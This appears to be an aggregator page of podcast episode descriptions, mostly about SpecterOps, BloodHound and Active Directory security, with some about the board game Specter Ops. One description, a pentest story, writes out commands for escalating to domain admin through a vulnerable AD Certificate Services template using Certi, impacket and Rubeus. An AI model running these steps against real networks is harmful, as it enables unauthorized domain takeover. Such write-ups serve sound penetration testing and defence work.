Podcasts about specter ops

In this episode, host Rob Wermuth is joined by Jason Frank, Chief Operating Officer at SpecterOps, to explore one of the most critical issues facing businesses today: cybersecurity. With a background in penetration testing, threat hunting, and enterprise security operations, Jason shares insights from years on the front lines of digital defense. They discuss the rise of ransomware, the impact of artificial intelligence on risk, and how zero trust models are reshaping security in a remote-first world. Jason breaks down complex topics into practical steps that business owners, especially those leading small to mid-sized companies, can act on today. From strengthening password protocols to implementing multi-factor authentication and managing identity risk, Jason offers clear, actionable advice. He also explains how tools like BloodHound can reveal vulnerabilities that often go unnoticed. Looking ahead, the conversation touches on balancing innovation with privacy, preparing the next generation of cybersecurity talent, and why an annually reviewed cyber action plan is essential to long-term business value. If you are thinking about how to better protect your organization, clients, and legacy in an increasingly digital world, this episode is filled with timely and practical guidance. ​​______________​​______________​​ Legacy Planning- 3440 Hamilton Blvd Allentown, PA 18103 and 228 W Gay Street West Chester, PA 19380  610-719-8600 www.legacy-online.com Legacy Planning offers securities and advisory services through Commonwealth Financial Network®, Member FINRA/SIPC, a Registered Investment Adviser. Legacy Planning is owned by HUB International. HUB and Commonwealth are separate and unrelated entities.  

In this Risky Bulletin sponsor interview Justin Kohler, Chief Product Officer at SpecterOps talks to Tom Uren about the impossible challenge of managing identity directory services securely. Organisations try to implement the principle of least privilege but have no idea if they have done a good job. Justin talks about approaches SpecterOps is developing to address this problem. Show notes

On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news with special guest Rob Joyce, a Former Special Assistant to the US President and Director of Cybersecurity for NSA. They talk through: A realistic bluetooth-proximity phishing attack against Passkeys A very patient ransomware actor encrypts an entire enterprise with a puny linux webcam processor The ESP32 backdoor that is neither a door nor at the back The X DDoS that Elon said was Ukraine is claimed by pro-Palestinian hacktivists Years later, LastPass hackers are still emptying crypto-wallets …and it turns out North Korea nailed {Safe}Wallet with a malicious docker image. Nice! Rob Joyce recently testified to the US House Select Committee on the Chinese Communist Party, and he explains why DOGE kicking probationary employees to the curb is “devastating” for the national security staff pipeline. This week's episode is sponsored by SpecterOps, makers of the Bloodhound identity attack path mapping tool. Chief Product Officer Justin Kohler and Principal Security Researcher Lee Chagolla-Christensen discuss their pragmatic approach to disabling NTLM authentication in Active Directory using Bloodhound's insight. This episode is also available on Youtube. Show notes CVE-2024-9956 - PassKey Account Takeover in All Mobile Browsers | Tobia Righi - Security Researcher Feds Link $150M Cyberheist to 2022 LastPass Hacks – Krebs on Security Camera off: Akira deploys ransomware via webcam Tarlogic detects a hidden feature in the mass-market ESP32 chip that could infect millions of IoT devices Alleged Co-Founder of Garantex Arrested in India – Krebs on Security 37K+ VMware ESXi instances vulnerable to critical zero-day | Cybersecurity Dive Apple patches 0-day exploited in “extremely sophisticated attack” - Ars Technica What Really Happened With the DDoS Attacks That Took Down X | WIRED Eleven11bot estimates revised downward as researchers point to Mirai variant | Cybersecurity Dive Previously unidentified botnet infects unpatched TP-Link Archer home routers | The Record from Recorded Future News Safe.eth on X: "Investigation Updates and Community Call to Action" / X How to verify Safe{Wallet} transactions on a hardware wallet | Safe{Wallet} Help Center and Support. US charges Chinese nationals in cyberattacks on Treasury, dissidents and more | The Record from Recorded Future News Former top NSA cyber official: Probationary firings ‘devastating' to cyber, national security | CyberScoop U.S. pauses intelligence sharing with Ukraine used to target Russian forces - The Washington Post

On this week's show, Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including: The SEC's cyber incident reporting isn't very exciting after all China Telecom on the way to being thrown out of the US The NSA/Cybercom might get two separate hats The Cl0p ransomware crew are back and taking responsibility for the Cleo hacks (Yet another) File upload bug in Struts makes Java admins weep And much, much more. This episode is sponsored by SpecterOps, who run a pretty top notch offsec/pentest team when they're not busy making the Bloodhound Enterprise identity attack path enumeration software. SpecterOps' Robby Winchester joins to talk about how pentest has changed, and how their customers get value from their testing. This episode is also available Youtube. Show notes SEC cyber incident reporting rule generates 71 filings in 11 months | Cybersecurity Dive US senators, green groups call for accountability over hacking of Exxon critics | Reuters Biden Administration Takes First Step to Retaliate Against China Over Hack - The New York Times Unfinished business for Trump: Ending the Cyber Command and NSA 'dual hat' | The Record from Recorded Future News EU opens investigation into TikTok and the Romanian election – POLITICO Clop ransomware claims responsibility for Cleo data theft attacks CISA warns of ransomware gangs exploiting Cleo, CyberPanel bugs | The Record from Recorded Future News CVE-2024-55956 | AttackerKB Apache issues patches for critical Struts 2 RCE bug • The Register Japanese game and anime publisher reportedly pays $3 million ransom to Russia-linked hackers | The Record from Recorded Future News Israeli spyware firm Paragon acquired by US investment group, report says | Reuters How Cryptocurrency Turns to Cash in Russian Banks – Krebs on Security Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop Russia bans Viber, claiming app facilitates terrorism and drug trafficking | The Record from Recorded Future News

It's been a tough few months for many local IT departments. Last week, hackers posted a handful of files stolen from SeaTac airport on the dark web. A ransomware gang is attempting to sell a trove of stolen Port of Seattle data for 6 million dollars in Bitcoin – after the Port refused to pay up. The cyber-attack a little over a month ago snarled travel when it took down ticketing, baggage, and other SeaTac services. But that's just the highest profile ransomware case in the Seattle area in recent months. A few weeks ago, the Highline School District canceled classes because a cyberattack had wormed its way into the local system. There was also a crippling ransomware attack on Seattle Public Libraries back in May, which put their book checkout and online systems in limbo for months For more on what's happening – and how organizations can protect themselves –Soundside caught up with Robby Winchester, the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.  Thank you to the supporters of KUOW, you help make this show possible! If you want to help out, go to kuow.org/donate/soundsidenotes Soundside is a production of KUOW in Seattle, a proud member of the NPR Network. Guests: Robby Winchester on the line. He's the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.  Related Links:  Hackers demand $6 million for files stolen from Seattle airport operator in cyberattack | AP News Highline schools closing Monday because of cyberattack | The Seattle Times Why did ransomware hackers target Seattle Public Library? – GeekWire See omnystudio.com/listener for privacy information.

In episode 101 of Cybersecurity Where You Are, Sean Atkinson is joined by Justin Kohler, Vice President of Products at SpecterOps, and Jonathan Parfait, Technical Account Manager at SpecterOps.Together, they discuss how the visualization of attack paths in Active Directory helps organizations to better contextualize risks to their enterprise security.Here are some highlights from our episode:01:54. What Bloodhound is and how it assists organizations in assessing risks in their Active Directory environments05:08. Why have organizations look at their Active Directory environments11:15. Common vulnerabilities and misconfigurations identified by Bloodhound21:21. How organizations can best use Bloodhound as part of their cyber defensive strategy29:18. How Bloodhound is adapting to keep up with evolving Active Directory environmentsResourcesBloodhound Community EditionEpisode 62: Inside the 'Spidey Sense' of a PentesterWhat You Need to Know About Hybrid Cloud EnvironmentsVulnerability Management Policy Template for CIS Control 7CIS Benchmarks ListIf you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.

On this week's show, Patrick Gray and Adam Boileau discuss the week's security news including: Microsoft did a good thing! Soon all Azure admins will require MFA The three billion row National Public Data breach mess, courtesy Florida Man US govt confirms that it was Iran that hacked the Trump campaign Is TP-Link the next Huawei, or just not very good at computers? Major Chinese RFID card maker has hardcoded backdoors And much, much more. This week's episode is sponsored by Specter Ops, makers of Bloodhound Enterprise. VP of Products Justin Kohler joins to talk about how they've joined their on-prem AD and cloud Entra attack path graphs, so you can map out that juicy, real-world attack surface. Show notes Announcing mandatory multi-factor authentication for Azure sign-in | Microsoft Azure Blog phishing resistant mfa - Google Search Microsoft will require MFA for all Azure users NationalPublicData.com Hack Exposes a Nation's Data – Krebs on Security National Public Data Published Its Own Passwords – Krebs on Security Bloomberg Law How the government's proposed 'Trust Exchange' digital ID scheme would work - ABC News German Cyber Agency Wants Changes in Microsoft, CrowdStrike Products After Tech Outage - WSJ Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts — FBI Crypto firm says hacker locked all employees out of Google products for four days ZachXBT on X: "Seven hours ago a suspicious transfer was made from a potential victim for 4064 BTC ($238M)" / X Bitcoin News Today: $238 Million Bitcoin Heist Linked to Genesis Global Trading Routers from China-based TP-Link a national security threat, US lawmakers claim Hardware backdoors found in Chinese smart cards Unmasking Styx Stealer: How a Hacker's Slip Led to an Intelligence Treasure Trove - Check Point Research Hardware backdoors found in Chinese smart cards Man who hacked Hawaii state registry to forge his own death certificate sentenced to 81 months

Guest: Zack Allen, Senior Director of Detection & Research @ Datadog, creator of Detection Engineering Weekly Topics: What are the biggest challenges facing detection engineers today? What do you tell people who want to consume detections and not engineer them? What advice would you give to someone who is interested in becoming a detection engineer at her organization? So, what IS a detection engineer? Do you need software skills to be one? How much breadth and depth do you need? What should a SOC leader whose team totally lacks such skills do? You created Detection Engineering Weekly. What motivated you to start this publication, and what are your goals for it? What are the learnings so far? You work for a vendor, so how should customers think of vendor-made vs customer-made detections and their balance?  What goes into a backlog for detections and how do you inform it? Resources: Video (LinkedIn, YouTube) Zacks's newsletter: https://detectionengineering.net  EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil EP117 Can a Small Team Adopt an Engineering-Centric Approach to Cybersecurity? The SRE book “Detection Spectrum” blog “Delivering Security at Scale: From Artisanal to Industrial” blog (and this too) “Detection Engineering is Painful — and It Shouldn't Be (Part 1)” blog series “Detection as Code? No, Detection as COOKING!” blog “Practical Threat Detection Engineering: A hands-on guide to planning, developing, and validating detection capabilities” book SpecterOps blog  

In this Risky Business News sponsored interview, Tom Uren talks to Justin Kohler, VP of the Bloodhound team at SpecterOps about ‘attack paths', the ways that malicious actors maneuver through Active Directory to elevate their privileges. They discuss how and why they arise and what you can do about them.

The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.

The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.

In Season 5, Episode 19 of the BSM podcast, host Steven Bowcut welcomes Jared Atkinson, the Chief Strategist at SpecterOps and the host of the "Detection Challenging Paradigms Podcast." The episode focuses on the dynamic and increasingly important topic of purple teaming within cybersecurity. Key Points Discussed - Evolution of Purple Teaming: Jared delves into the progression of purple teaming practices and their significance in the current threat landscape. He emphasizes how both defensive (blue team) and offensive (red team) strategies have melded to form a more comprehensive security approach. - Testing Landscape and Vendor Claims: The conversation touches on how the testing landscape has evolved, particularly considering vendor claims about the capabilities of their security solutions. Jared scrutinizes these claims and suggests a more measured approach to evaluating their efficacy. - Shortcomings in Purple Team Assessments: Jared enumerates the reasons why many purple team assessments don't reach their full potential. These shortcomings often stem from a lack of realistic testing scenarios or comprehensive coverage of possible attack vectors. - Role of New Frameworks: The introduction of new frameworks like Atomic Testing is highlighted as a game-changer in the field. Jared talks about how these frameworks can improve the precision and effectiveness of security assessments. - Building and Selecting Test Cases: The importance of building and selecting diverse and relevant test cases is discussed. Jared underlines the necessity for organizations to cover a wide range of attack techniques in their testing protocols. - Evolution of Attack Techniques: Examples of how attack techniques have evolved over time are provided, offering listeners insights into the adaptive nature of cyber threats. - Analyzing Malware Samples: Jared points to SpecterOps's 10-part blog series that offers a deep dive into the technical aspects of malware sample analysis, an essential skill for modern threat hunters. - Future of Purple Teaming: Finally, Jared presents his perspective on the direction purple teaming should take in the future. He stresses the need for continual adaptation and the adoption of forward-thinking strategies to stay ahead of threat actors. Conclusion The episode is informative for cybersecurity professionals looking to understand the current state and the progression of purple teaming. Jared Atkinson's expertise provides listeners with a detailed examination of the challenges and considerations essential to advancing the effectiveness of cybersecurity defenses through collaborative and realistic testing. The discussion not only sheds light on current practices but also charts a course for the future of purple teaming, making it a must-listen for those engaged in or interested in the strategic aspects of cybersecurity.

On this show this week we're talking about Microsoft unbundling Microsoft Teams in response to Slack: Good or bad and how will it affect you? New features coming to Teams that are long awaited, plus Justin Kohler from SpecterOps joins us on the show to talk about his TEC conference session & give us a plethora of AD-related cybersecurity advice. Hey Practical 365 Podcast Listeners, we need your feedback! Tell us what you would like to hear about in our upcoming episodes by filling out this 1-minute survey.  Want to stay up to date on all things Practical 365? Follow us on Twitter, Facebook, and Linkedin to stay up to date on all things Microsoft!

Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.

Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.

GuestJustin KohlerVice President of Products at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/On Twitter | https://twitter.com/JustinKohler10HostPhillip WylieOn ITSPmagazine  

GuestJustin KohlerVice President of Products at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/On Twitter | https://twitter.com/JustinKohler10HostPhillip WylieOn ITSPmagazine  

GuestStephen HinckSystem Engineering Manager at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/shinck/On Twitter | https://twitter.com/StephenHinckHostPhillip WylieOn ITSPmagazine  

GuestStephen HinckSystem Engineering Manager at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/shinck/On Twitter | https://twitter.com/StephenHinckHostPhillip WylieOn ITSPmagazine  

CyberFront Z's failed influence operation. Iranian operators target Albanian government networks. CISA issues two ICS security advisories. Andy Robbins of SpecterOps to discuss Attack Paths in Azure. Denis O'Shea of Mobile Mentor talking on the intersection of endpoint security and employee experience. CISA and ACSC issue a joint advisory on top malware strains. or links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/11/150 Selected reading. Quarterly Adversarial Threat Report (Meta) Meta took down Russian troll farm that supported country's invasion of Ukraine (The Hill) Russia's Infamous Troll Farm Is Back -- and Sh*tting the Bed (Rolling Stone)  Meta's threat report highlights clumsy attempt to manipulate Ukraine discourse (TechCrunch)  Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations (Mandiant)  CISA Alert AA22-216A – 2021 top malware strains. (The CyberWire) 2021 Top Malware Strains (CISA) Digi ConnectPort X2D (CISA) Cisco Releases Security Updates for RV Series Routers (CISA)

This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

In Episode 9, Robby Winchester of SpecterOps stops by to talk on Jared's favorite topic - Detectionomics (trademark pending). This was our second in-person episode and was a blast to make, we hope you enjoy!

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows: Grab Certi Grab Certify Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed: msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands: sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do: rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER And that's it! Do a dir FQDN.TO.DOMAIN.CONTROLLERC$ and enjoy your new super powers!

We love playing games in-person! But sometimes you want to scratch that board-gaming itch for a few minutes in the middle of the workweek. Or during a "break." Or, well, all the damn time. Playing asynchronously on Board Game Arena lets you do just that...a lot. Just don't tell our bosses. Our BGA play pals Emerson Matsuuchi (designer of the Century series, Specter Ops, Reef, and the upcoming Foundations of Rome) and Jess Yi (frequent Going Analog contributor) join Christina and Shoe to gab about Board Game Arena vs. Tabletop Simulator, which games work best on the platform, and whether we can learn how to play (and enjoy) an entire game online without ever reading the rules. Our topics this episode: Jess (contributor): Board Game Arena vs. Tabletop Simulator Christina (host): Which games are better on Board Game Arena, and which are worse? Emerson (guest): Our experiences playing "blind" on Board Game Arena

Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

SpecterOps researchers Lee Christensen and Will Schroeder discuss their work, to be presented at Black Hat, on how AD “misconfiguration debt” lays out a dizzying array of attack paths such as the one in the PetitPotam exploit for which Microsoft  rushed out a fix.

In this episode, Chris Hadnagy and Ryan MacDougall are joined by Jason Frank.  Jason has an extensive background in helping both government and Fortune 100 organizations, and has served a course instructor for the Black Hat security conference. Jason is now currently the COO at SpecterOps, where he is accountable for execution of the company. He oversees the Adversary Simulation and Detection delivery capabilities, where he helps clients to understand, detect, and respond to adversaries. May 17, 2021   00:00 – Intro  Social-Engineer.com  Social-Engineer.org  InnocentLivesFoundation.org  Human Hacking Book  Vishing as a Service (VaaS)  Phishing as a Service (PHaaS)  HumanHackingBook.com  Slack Channel  @HumanHacker on Twitter  CLUTCH  03:05 – Podcast Guest Jason Frank Intro   03:22 – Jason at BlackHat  03:30 - SpecterOps  04:34 – How Jason got to where he is  08:50 – Curiousity and motivation born from failing at a CTF  09:50 – Adversary Simulation – why is Jason using this phrase?  12:32 – Where are we in the current security culture?  16:11 – How to get attention of stakeholders, what concepts do you put in play?  18:03 – Reactive vs. Proactive  21:56 – How can corporations prepare for and mitigate attacks?  23:39 – What are the business repercussions of not letting machines talk to each other, and only the server?  25:45 – What are the more recent attacks you’ve seen coming up that people should be looking for?  28:14 – Knowledge bombs – terminology that people can look up to recognize “low hanging fruit” they may be missing – Bloodhound  30:00 – Cycles where certain things can be exploited such as ActiveDirectory  30:50 – What other things do companies need to be watching for  32:14  – PowerShell  33:44 – What are some action steps that corporations should start taking right now?  34:51 – Colleagues Jason respects most in the industry  Andrew Morris founder of GreyNoise  Dane Stuckey from Palantir  Jason Hill from DHS CISA  Bryan Beyer and Keith McCammon from Red Canary  36:50 – Jason's Book Recommendations  Creativity Inc.  Principles: Life and Work  Get A Grip  38:31 – Wrap-Up  @jasonjfrank on Twitter  Jason J Frank on LinkedIn  @joemontmania on Twitter (Ryan MacDougall)  @HumanHacker on Twitter (Chris Hadnagy)  @InnocentOrg on Twitter (Innocent Lives Foundation) 

Today we talk about another video game IP that’s found its way into the table top world, an awesome hidden movement game, and we share our tips and tricks for being the best board game teacher you can be.

In today's episode we discuss Western-themed games, both those that missed the mark for us and those that bring forth the excitement that is the Wild, Wild West.  Our in-depth game review this week is Paleo by Peter Rustemeyer and published by Hans im Glück. This co-operative game is discussed at length as we discuss mechanisms, theme, arc and everything else that makes this game unique. In this episode we discuss Imperial Settlers, Empyreal: Spells & Steam, 7 Wonders, Pax Pamir, John Company, Specter Ops, plus some Western-themed games. Our game giveaway is Offshore from Aporta Games. See our Instagram for official rules. As always, if you enjoy our content, please consider liking, subscribing, and/or sharing our podcast wherever you are listening to this. We can be found on multiple other social media platforms include Instagram and Facebook. (see links below) Instagram: https://www.instagram.com/boardgamegambit/ Facebook: https://www.facebook.com/boardgamegambit/ Intro Music: [Sitcom Rock Sting] by Alexander Nakarada (www.serpentsoundstudios.com) Licensed under Creative Commons BY Attribution 4.0 License https://creativecommons.org/licenses/by/4.0/ Outro Music: [Sitcom Rock Sting 2] by Alexander Nakarada (www.serpentsoundstudios.com) Licensed under Creative Commons BY Attribution 4.0 License https://creativecommons.org/licenses/by/4.0/

Dylan and Bill explore the unseen corners of the hidden movement game, Specter Ops.

Sometimes all it takes is a good designer (and the right game) to take what would otherwise be a mechanic we don't like, and utilize it in a way that feels right. We take a look at some mechanics that we usually don't love, and the games that turned us around on them. Before we see things in a new light, we talk about CloudAge, Mariposas, and Faiyum. 03:04 - CloudAge 12:37 - Mariposas 18:01 - Faiyum 28:27 - Games that rescued a mechanism 28:40 - Performative Clues 29:05 - Time's Up 31:29 - On a Scale of One to T-Rex 32:19 - Action Points 32:52 - Flash Point: Fire Rescue 34:00 - Blood Rage 37:18 - Hidden Movement 37:18 - Nuns on the Run 37:45 - Specter Ops 38:35 - Scotland Yard 42:16 - Card Drafting 42:25 - Agricola 42:46 - 7 Wonders 43:53 - Paper Tales 44:25 - Inis 47:22 - Player Elimination 47:22 - Werewolf 47:40 - Shadow Hunters 48:09 - Secret Hitler 49:15 - Blood on the Clocktower 50:50 - "The Dice Game" 52:00 - For the King (and Me) 52:41 - Ra: The Dice Game Join the discussion at: https://boardgamebarrage.com/discord Join our Facebook group at: https://boardgamebarrage.com/facebook Get a Board Game Barrage T-shirt at: https://boardgamebarrage.com/store

Emma, Gil, and Scott discuss the idea of complexity in a board game. We explore 6 types of complexity, and discuss their effects on the games we play and design. SHOW NOTES 0m51s: Pete Seeger was an American folk singer, known for songs like "If I Had a Hammer," "Turn, Turn, Turn," and "Where Have All the Flowers Gone?" 2m04s: Our list of complexities: Spatial complexity Arithmetical complexity Zone complexity Planning complexity Rules/mechanism complexity Component complexity 2m45s: Barenpark, New York Zoo 3m44s: The SAT is a standardized test in the United States that is a major factor in a college's admission of a prospective student. 4m16s: Number 9 4m32s: Bosk 5m31s: Photosynthesis 6m30s: Treasure Island, Escape from the Aliens in Outer Space, Specter Ops, Tigris & Euphrates 7m14s: Checking the rules, an Internal Conflict in Tigris & Euphrates happens when a Leader is moved to a Kingdom where there is already a Leader of the same color belonging to another player. 8m00s: Star Wars: X-Wing Miniatures Game. Check out Scott's Biography of a Board Game on the Flight Path family of games, including X-Wing and Wings of War. 8m25s: The Warhammer family of games is absolutely massive. The flagship game, Warhammer 40,000, is in its 9th edition.  10m18s: The Funkoverse Strategy Game. We chatted with Chris Rowlands, one of its designers, in Ludology 224: Putting the Fun in Funko. 11m01s: Heroclix, Heroscape 13m23s: Set 15m17s: Power Grid, Russian Railroads, and Gil's own The Networks 16m26s: The term "Goumbaud's Law" was coined by Jesse Schell in his book The Art of Game Design: A Book of Lenses. 21m12s: Sticheln (the pronunciation of which Gil has completely butchered) was recently re-released by Capstone Games as Stick 'Em. Smartphone Inc. 22m46s: Sushi Go, Disney: The Haunted Mansion – Call of the Spirits Game 25m38s: Search for Planet X, Zendo (Kory Heath's design diary for Zendo remains a fantastic look at how hard it is to design a seemingly simple game.) 26m40s: Mastermind 28m12s: Here's a description of the XYZ Wing solve technique for Sudoku. 28m33s: https://www.youtube.com/watch?v=Bg21M2zwG9Q (explicit language warning) 28m59s: Hey, That's My Fish, graph theory, and the Traveling Salesman problem. 29m33s: Scott first proposed the 6 Zones of Play in Ludology 209 - The 6 Zones of Play. 32m28s: Formula D 33m27s: Seafall, the Betrayal family of games. 41m21s: Ra 43m53s: A Feast for Odin 44m22s: A Few Acres of Snow 46m45s: Nielsen Media Research is best known for its Nielsen TV ratings, that offer the TV industry in the United States metrics into the number of viewers a TV show enjoys. 48m06s: Advanced Squad Leader, The Campaign for North Africa 50m13s: We discussed the futility of 1:1 models with Volko Ruhnke in Ludology 178 - COIN Operated. Gil also brings up the "Map-territory relation" problem. 50m29s: Food Chain Magnate, Feudum, Cloudspire, Kanban 54m48s: Two designers who work in complex games: Vital Lacerda and Dávid Turczi. You can hear our chat with Dávid about complex games in Ludology 234 - Playing with Time. 55m34s: Brass: Lancashire 57m27s: Fresco 1h00m20s: Gil discussed his doomed auction mechanism most recently in Ludology 235 - Rise to the Challenge. 1h01m45s: Samurai, Steel Driver, For Sale. Here's Samurai's scoring system: If one player has the most figures of 2 or 3 of the types of figures, they win. If no one has won in the previous step, only players who have the most of a single type of figure can win. All other players are eliminated. The remaining players set aside the figures they have of which they have the most of a certain type. The player with the most remaining figures wins. In case of a tie, the tied players re-collect all their figures and count their total number of figures. Highest total wins, all remaining ties are shared. 1h02m30s: Nomic, Fluxx 1h09m23s: Descent: Journeys in the Dark 1h10m45s: Geoff and Gil discussed "tight coupling" in Ludology 172 - Odd Coupling. 1h12m04s: Carcassonne (the type Gil was thinking of is Monk) 1h13m25s: The Betrayal family of games (again) 1h14m46s: GameTrayz 1h16m20s: Mike Selinker uttered this now-legendary quote in Ludology 189 - The Missing Selinker. 1h17m47s: Gil's announcements: BGG@Home, Weird Stories pregen settings, High Rise pre-orders opening soon, Rival Networks 1h20m02s: Battling Tops, and the legendary BGG Battling Tops tournament. 1h20m22s: Tabletopia 1h20m44s: Emma, Gil, and Scott recorded Ludology 215 - Table Topics live at BGG.CON 2019. 1h21m06s: Scott's announcements: Treats, Xeno Command, Comic Book Crisis, The Pitch Project. 1h24m06s: Emma's announcements: Game Maker's Guild panel, Dutch and Hungarian versions of Abandon All Artichokes. 1h25m26s: Our contact info: Emma (Twitter, Instagram, Web), Gil (Twitter, Facebook, Web), Scott (Twitter, Instagram, and Facebook)

Our latest episode kept having the audio cut in and out.... It was unusable. So you get our unreleased pilot instead! We recorded this a long time ago, so I have no idea what's in the episode... It's a surprise! It's really a win-win situation when you think about it... You win twice! p.s. Jake is not in this episode, so I guess you lose as well.

